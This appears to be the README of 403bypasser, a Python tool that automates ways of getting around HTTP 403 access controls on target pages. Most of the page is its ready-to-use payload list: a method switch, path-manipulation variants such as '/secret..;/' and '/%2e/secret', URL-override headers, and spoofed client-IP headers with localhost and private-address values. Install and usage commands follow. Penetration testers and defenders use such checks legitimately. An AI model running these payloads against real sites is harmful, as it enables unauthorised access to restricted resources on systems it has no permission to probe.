403bypasser: circumvent access control restrictions on target pages
403bypasser
403bypasser automates the techniques used to circumvent access control restrictions on target pages. 403bypasser will continue to be improved and it is open to contributions.
Which Cases Does This Tool Check?
1. Request Method Manipulation
Convert GET request to POST request
2. Path Manipulation
/%2e/secret
/secret/
/secret..;/
/secret/..;/
/secret%20
/secret%09
/secret%00
/secret.json
/secret.css
/secret.html
/secret?
/secret??
/secret???
/secret?testparam
/secret#
/secret#test
/secret/.
//secret//
/./secret/./
3. Overriding the Target URL via Non-Standard Headers
X-Original-URL: /secret
X-Rewrite-URL: /secret
4. Other Headers & Values
Headers:
X-Custom-IP-Authorization
X-Forwarded-For
X-Forward-For
X-Remote-IP
X-Originating-IP
X-Remote-Addr
X-Client-IP
X-Real-IP
Values:localhost
localhost:80
localhost:443
127.0.0.1
127.0.0.1:80
127.0.0.1:443
2130706433
0x7F000001
0177.0000.0000.0001
0
127.1
10.0.0.0
10.0.0.1
172.16.0.0
172.16.0.1
192.168.1.0
192.168.1.1
Install
git clone https://github.com/yunemse48/403bypasser.git
pip install -r requirements.txt
Use
Usage 1: python3 403bypasser.py -u https://example.com -d /secret
Usage 2: python3 403bypasser.py -u https://example.com -D dirlist.txt
Usage 3: python3 403bypasser.py -U urllist.txt -d /secret
Usage 4: python3 403bypasser.py -U urllist.txt -D dirlist.txt
IMPORTANT NOTE: All the following are interpreted the same. Therefore, which pattern you use is just a matter of preference.
python3 403bypasser.py -u https://example.com -d secret
python3 403bypasser.py -u https://example.com -d /secret
python3 403bypasser.py -u https://example.com -d /secret/
python3 403bypasser.py -u https://example.com -d secret/
python3 403bypasser.py -u https://example.com/ -d secret
ALL THE SAME!
Since Python is a cross-platform language, one can run this program on different operating systems.
Output
The output of the program is saved (in the current directory) in a file with the name of the domain name given as input.
For example:
python3 403bypasser.py -u https://example.com -d /secret is given. Then the output is saved to example.txt in the current directory.
Copyright (c) 2021 Yunus Emre SERT
Source: https://github.com/yunemse48/
